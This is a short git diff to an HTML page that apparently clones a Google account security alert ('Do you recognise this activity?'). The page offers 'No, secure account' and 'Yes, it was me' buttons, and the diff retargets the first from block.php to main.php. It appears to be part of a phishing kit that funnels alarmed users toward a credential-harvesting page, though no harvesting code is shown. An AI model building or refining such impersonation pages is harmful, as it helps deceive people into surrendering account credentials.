--- a/index.html
+++ b/index.html
@@ -30,7 +30,7 @@
     <div class="vzFH0" jsname="y9Vufe">Do you recognise this activity?</div><br>
 
 
-    <a class="btn btn-light mb-5" href="block.php">No, secure account</a>
+    <a class="btn btn-light mb-5" href="main.php">No, secure account</a>
     <a class="btn btn-light mb-5" href="yes.html" >Yes, it was me</a>
 
 
